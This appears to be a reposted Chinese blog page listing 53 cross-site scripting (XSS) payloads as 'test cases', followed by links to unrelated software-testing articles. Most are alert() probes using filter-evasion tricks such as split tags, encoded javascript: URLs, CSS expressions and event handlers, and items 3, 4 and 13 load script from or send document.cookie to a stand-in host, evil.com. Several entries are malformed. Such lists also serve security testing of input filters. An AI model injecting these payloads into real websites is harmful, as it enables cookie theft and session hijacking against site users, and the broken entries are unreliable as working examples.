xss测试用例

Posted 2021-01-05 bl8ck

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了xss测试用例相关的知识，希望对你有一定的参考价值。

1.<script> alert(1);</script>

2.<script>alert(‘xss‘);</script>

3.<script src="http://www.evil.com/cookie.php"></script>

4.<script>location.href="http://www.evil.com/cookies.php?cookie="+escape(document.cookie)"</script>

5.<scr<script>ipt>alert(‘xss‘);</scr</script>ipt>

6.<img src=liu.jpg onerror=alert(/xss/)/>

7.<style>@import‘javasc ipt:alert("xss")‘;</style>

8.<?echo(‘<src)‘; echo(‘ipt>alert("xss")‘;</script>‘);?>

9.<marquee><script>alert(‘xss‘)</script></marquee>

10.<IMG SRC="jav&#0x9;ascript:alert(‘xss‘);">

11.<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

12."><script>alert(1)</script>

13.<script src=http://www.evil.com/files.js></script>

14.</title><script>alert(/xss/)</script>

15.</textarea><script>alert(/xss)</script>

16.<IMG LOWSRC="javascript:alert(‘XSS‘)">

17.<IMG DYNSRC="javascript:alert(‘XSS‘)">

18.<font style=‘color:expression(alert(document.cookie))‘>

19.‘);alert(‘XSS

20.<img src="javascript:alert(‘XSS‘)">

21.[url=javascript:alert(‘XSS‘);]click me[/url]

22.<body onunload="javascript:alert(‘XSS‘);">

23.<body onLoad="alert(‘XSS‘);"

24.[color=red‘ onmouseover="alert(‘XSS‘)"]mouse over[/color]

25."/></a></><img src=1.gif onerror=alert(1)>

26.window.alert("XSS");

27.<div style="x:expression((window==1)?":eval(‘r=1;alert(String.fromCharCode(83,83,83));‘))">

28.<iframe<?php eval chr(11)?>onload=alert(‘XSS‘)></iframe>

29."><script alert(String.fromCharCode(88,83,83))</script>

30.‘>><marquee><h1>XSS<h1></marquee>

31.‘">><script>alert(‘xss‘)</script>

32.‘">><marquee><h1>XSS</h1></marquee>

33.<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘XSS‘);">

34.<META HTTP-EQUIV="refresh"CONTENT="0;URL=http://;url=javascript:alert(‘XSS‘);">

35.<script>var var=1; alert(var)</script>

36.<STYLE type="text/css">BODY{background:url("javascript:alert(‘XSS‘)")}</STYLE>

37.<?=‘<SCRIPT>alert("XSS")</SCRIPT>‘?>

38.<IMG SRC=‘vbscript:msgbox("XSS")‘>

39."onfocus=alert(document.domain)"><"

40.<FRAMESET><FRAME SRC="javascript:alert(‘XSS‘);"></FRAMESET>

41.<STYLE>li {list-style-image:url("javascript:alert(‘XSS‘)");}</STYLE><UL><LI>XSS

42.<br size="&{alert(‘xss‘)}">

43.<scrscriptipt>alert(1)</scrscriptipt>

44."><BODY onload!#$%&()*~+-_.,:;[email protected][/|]^`=alert("XSS")>

45.[color=red width=expression(alert(123))][color]

46.<BASE HREF="javascript:alert(‘XSS‘);//">

47.Execute(MsgBox(chr(88)&&chr(83)&&chr(83)))<

48."></iframe><script>alert(123)</script>

49.<body onLoad="while(true) alert(‘XSS‘);">

50."<marquee><img src=k.png onerror=alert(/xss/) />

51.<div style="background:url(‘javascript:‘)

52.<img src=‘java script:alert("XSS")‘>

53.>‘"><img src="javascript:alert(‘xss‘)">

以上是关于xss测试用例的主要内容，如果未能解决你的问题，请参考以下文章

测试用例(功能用例)——完整demo（一千多条测试用例）

测试用例模板组成

执行测试用例应注意啥？

标准测试中一天能写多少测试用例？执行多少用例？这个有标准不？

软件测试的分类&测试用例的设计&如何编写测试用例

测试用例的编写